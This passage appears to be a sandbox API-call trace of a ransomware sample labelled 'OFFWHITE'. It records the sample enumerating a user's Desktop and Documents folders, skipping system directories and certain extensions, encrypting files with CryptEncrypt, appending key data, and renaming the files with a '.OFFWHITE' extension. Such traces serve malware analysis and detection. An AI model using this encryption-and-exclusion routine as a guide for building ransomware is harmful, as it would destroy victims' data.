(lpString1=".flv", lpString2=".mp3") returned -1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".pif") returned -1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".mp4") returned -1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".OFFWHITE") returned -1 [0132.660] lstrcmpiW (lpString1=".flv", lpString2=".msi") returned -1 [0132.660] lstrcmpiW (lpString1="QkrA8bST.flv", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0132.660] GetProcessHeap () returned 0x500000 [0132.660] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f568 [0132.660] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\qkra8bst.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0132.661] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295dee0 | out: lpFileSize=0x295dee0*=73734) returned 1 [0132.661] GetProcessHeap () returned 0x500000 [0132.661] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.661] GetProcessHeap () returned 0x500000 [0132.661] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.661] GetProcessHeap () returned 0x500000 [0132.661] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.661] GetProcessHeap () returned 0x500000 [0132.661] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.661] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.661] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.661] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.661] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.661] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.661] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.661] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.661] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.661] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295dc90*=0x100) returned 1 [0132.662] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.662] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.662] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295dc8c*=0x100) returned 1 [0132.662] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12006, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.662] SetLastError (dwErrCode=0x0) [0132.662] WriteFile (in: hFile=0x21c, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.666] GetLastError () returned 0x0 [0132.666] GetLastError () returned 0x0 [0132.666] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12106, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.666] WriteFile (in: hFile=0x21c, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295decc*=0x100, lpOverlapped=0x0) returned 1 [0132.666] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12206, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.666] WriteFile (in: hFile=0x21c, lpBuffer=0x53f568*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x53f568*, lpNumberOfBytesWritten=0x295decc*=0x8, lpOverlapped=0x0) returned 1 [0132.666] GetProcessHeap () returned 0x500000 [0132.666] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x12006) returned 0x55a7b8 [0132.666] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.666] ReadFile (in: hFile=0x21c, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x12006, lpNumberOfBytesRead=0x295dec0, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295dec0*=0x12006, lpOverlapped=0x0) returned 1 [0132.672] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.672] WriteFile (in: hFile=0x21c, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x12006, lpNumberOfBytesWritten=0x295decc, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295decc*=0x12006, lpOverlapped=0x0) returned 1 [0132.673] GetProcessHeap () returned 0x500000 [0132.673] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.673] CloseHandle (hObject=0x21c) returned 1 [0132.675] GetProcessHeap () returned 0x500000 [0132.675] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.675] GetProcessHeap () returned 0x500000 [0132.675] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.675] GetProcessHeap () returned 0x500000 [0132.675] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.675] GetProcessHeap () returned 0x500000 [0132.675] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.675] lstrcpyW (in: lpString1=0x295dcb8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv" [0132.675] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv.OFFWHITE" [0132.675] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\qkra8bst.flv"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\_6fHsSKGxaaF_3ovS\\QkrA8bST.flv.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\_6fhsskgxaaf_3ovs\\qkra8bst.flv.offwhite")) returned 1 [0132.676] FindNextFileW (in: hFindFile=0x544650, lpFindFileData=0x295df18 | out: lpFindFileData=0x295df18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x379804e0, ftCreationTime.dwHighDateTime=0x1d5dad0, ftLastAccessTime.dwLowDateTime=0x7cbaa500, ftLastAccessTime.dwHighDateTime=0x1d5de59, ftLastWriteTime.dwLowDateTime=0x7cbaa500, ftLastWriteTime.dwHighDateTime=0x1d5de59, nFileSizeHigh=0x0, nFileSizeLow=0x12006, dwReserved0=0x295debc, dwReserved1=0xe84b75dd, cFileName="QkrA8bST.flv", cAlternateFileName="")) returned 0 [0132.676] FindClose (in: hFindFile=0x544650 | out: hFindFile=0x544650) returned 1 [0132.676] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x2b14cd20, ftCreationTime.dwHighDateTime=0x1d5e4fd, ftLastAccessTime.dwLowDateTime=0x4a11f230, ftLastAccessTime.dwHighDateTime=0x1d5d90d, ftLastWriteTime.dwLowDateTime=0x4a11f230, ftLastWriteTime.dwHighDateTime=0x1d5d90d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="_6fHsSKGxaaF_3ovS", cAlternateFileName="_6FHSS~1")) returned 0 [0132.676] FindClose (in: hFindFile=0x544610 | out: hFindFile=0x544610) returned 1 [0132.676] FindNextFileW (in: hFindFile=0x544690, lpFindFileData=0x295ec18 | out: lpFindFileData=0x295ec18*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb944740, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb944740, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x295f6f0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2=".") returned 1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2="..") returned 1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2="...") returned 1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2="windows") returned -1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2="$recycle.bin") returned 1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2="rsa") returned -1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2="ntuser.dat") returned -1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2="programdata") returned -1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2="appdata") returned 1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2="program files") returned -1 [0132.677] lstrcmpiW (lpString1="Documents", lpString2="program files (x86)") returned -1 [0132.677] lstrcpyW (in: lpString1=0x295ee68, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\" [0132.677] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\", lpString2="Documents" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0132.677] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpString2="\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0132.677] lstrcpyW (in: lpString1=0x295e9f0, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0132.677] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="*.*" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*" [0132.677] FindFirstFileW (in: lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\*.*", lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb944740, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb944740, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName=".", cAlternateFileName="")) returned 0x544610 [0132.678] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0132.678] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xdb944740, ftLastAccessTime.dwHighDateTime=0x1d5e82a, ftLastWriteTime.dwLowDateTime=0xdb944740, ftLastWriteTime.dwHighDateTime=0x1d5e82a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="..", cAlternateFileName="")) returned 1 [0132.680] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0132.680] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0132.680] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x336b37a0, ftCreationTime.dwHighDateTime=0x1d55b7a, ftLastAccessTime.dwLowDateTime=0xb6648340, ftLastAccessTime.dwHighDateTime=0x1d5bdd2, ftLastWriteTime.dwLowDateTime=0xb6648340, ftLastWriteTime.dwHighDateTime=0x1d5bdd2, nFileSizeHigh=0x0, nFileSizeLow=0x6a46, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="0HVUia0H x82oF_m.pptx", cAlternateFileName="0HVUIA~1.PPT")) returned 1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2=".") returned 1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="..") returned 1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="...") returned 1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="windows") returned -1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="$recycle.bin") returned 1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="rsa") returned -1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="ntuser.dat") returned -1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="programdata") returned -1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="appdata") returned -1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="program files") returned -1 [0132.680] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="program files (x86)") returned -1 [0132.680] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0132.680] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="0HVUia0H x82oF_m.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx" [0132.680] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.680] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.680] PathFindExtensionW (pszPath="0HVUia0H x82oF_m.pptx") returned=".pptx" [0132.680] lstrcmpiW (lpString1=".pptx", lpString2=".exe") returned 1 [0132.680] lstrcmpiW (lpString1=".pptx", lpString2=".log") returned 1 [0132.680] lstrcmpiW (lpString1=".pptx", lpString2=".cab") returned 1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".cmd") returned 1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".com") returned 1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".cpl") returned 1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".ini") returned 1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".dll") returned 1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".url") returned -1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".ttf") returned -1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".mp3") returned 1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".pif") returned 1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".mp4") returned 1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".OFFWHITE") returned 1 [0132.681] lstrcmpiW (lpString1=".pptx", lpString2=".msi") returned 1 [0132.681] lstrcmpiW (lpString1="0HVUia0H x82oF_m.pptx", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0132.681] GetProcessHeap () returned 0x500000 [0132.681] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x53f578 [0132.681] CreateFileW (lpFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0hvuia0h x82of_m.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xb0 [0132.682] GetFileSizeEx (in: hFile=0xb0, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=27206) returned 1 [0132.682] GetProcessHeap () returned 0x500000 [0132.682] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487a8 [0132.682] GetProcessHeap () returned 0x500000 [0132.682] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x5487c0 [0132.682] GetProcessHeap () returned 0x500000 [0132.682] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5242b0 [0132.683] GetProcessHeap () returned 0x500000 [0132.683] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5243b8 [0132.683] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.683] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.683] SystemFunction036 (in: RandomBuffer=0x5487a8, RandomBufferLength=0x10 | out: RandomBuffer=0x5487a8) returned 1 [0132.683] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.683] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.683] SystemFunction036 (in: RandomBuffer=0x5487c0, RandomBufferLength=0x10 | out: RandomBuffer=0x5487c0) returned 1 [0132.683] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.683] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.683] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5242b0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5242b0*, pdwDataLen=0x295e310*=0x100) returned 1 [0132.683] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.683] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.683] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5243b8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0132.684] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6a46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.684] SetLastError (dwErrCode=0x0) [0132.684] WriteFile (in: hFile=0xb0, lpBuffer=0x5242b0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5242b0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.686] GetLastError () returned 0x0 [0132.686] GetLastError () returned 0x0 [0132.686] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6b46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.686] WriteFile (in: hFile=0xb0, lpBuffer=0x5243b8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5243b8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0132.686] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x6c46, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.686] WriteFile (in: hFile=0xb0, lpBuffer=0x53f578*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f578*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0132.686] GetProcessHeap () returned 0x500000 [0132.686] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6a46) returned 0x55a7b8 [0132.686] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.686] ReadFile (in: hFile=0xb0, lpBuffer=0x55a7b8, nNumberOfBytesToRead=0x6a46, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesRead=0x295e540*=0x6a46, lpOverlapped=0x0) returned 1 [0132.689] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0132.689] WriteFile (in: hFile=0xb0, lpBuffer=0x55a7b8*, nNumberOfBytesToWrite=0x6a46, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x55a7b8*, lpNumberOfBytesWritten=0x295e54c*=0x6a46, lpOverlapped=0x0) returned 1 [0132.689] GetProcessHeap () returned 0x500000 [0132.689] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x55a7b8 | out: hHeap=0x500000) returned 1 [0132.689] CloseHandle (hObject=0xb0) returned 1 [0132.694] GetProcessHeap () returned 0x500000 [0132.694] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5242b0 | out: hHeap=0x500000) returned 1 [0132.694] GetProcessHeap () returned 0x500000 [0132.695] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5243b8 | out: hHeap=0x500000) returned 1 [0132.695] GetProcessHeap () returned 0x500000 [0132.695] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487a8 | out: hHeap=0x500000) returned 1 [0132.695] GetProcessHeap () returned 0x500000 [0132.695] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5487c0 | out: hHeap=0x500000) returned 1 [0132.695] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx" [0132.695] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx", lpString2=".OFFWHITE" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx.OFFWHITE") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx.OFFWHITE" [0132.695] MoveFileW (lpExistingFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0hvuia0h x82of_m.pptx"), lpNewFileName="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\0HVUia0H x82oF_m.pptx.OFFWHITE" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\0hvuia0h x82of_m.pptx.offwhite")) returned 1 [0132.696] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x635425a0, ftCreationTime.dwHighDateTime=0x1d5e6f6, ftLastAccessTime.dwLowDateTime=0x8f797290, ftLastAccessTime.dwHighDateTime=0x1d5aa59, ftLastWriteTime.dwLowDateTime=0x8f797290, ftLastWriteTime.dwHighDateTime=0x1d5aa59, nFileSizeHigh=0x0, nFileSizeLow=0x6c89, dwReserved0=0x440042, dwReserved1=0x295f070, cFileName="1tzKSsYVLnjt.xlsx", cAlternateFileName="1TZKSS~1.XLS")) returned 1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2=".") returned 1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="..") returned 1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="...") returned 1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="windows") returned -1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="$recycle.bin") returned 1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="rsa") returned -1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="ntuser.dat") returned -1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="programdata") returned -1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="appdata") returned -1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="program files") returned -1 [0132.696] lstrcmpiW (lpString1="1tzKSsYVLnjt.xlsx", lpString2="program files (x86)") returned -1 [0132.696] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0132.696] lstrcatW (in: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="1tzKSsYVLnjt.xlsx" | out: lpString1="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx") returned="C:/Users\\5p5NrGJn0jS HALPmcxz\\Documents\\1tzKSsYVLnjt.xlsx" [0132.696] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0132.696] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0132.697] PathFindExtensionW (pszPath="1tzKSsYVLnjt.xlsx") returned=".xlsx" [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".exe") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".log") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".cab") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".cmd") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".com") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".cpl") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".ini") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".dll") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".url") returned 1 [0132.697] lstrcmpiW (lpString1=".xlsx", lpString2=".ttf") returned 1 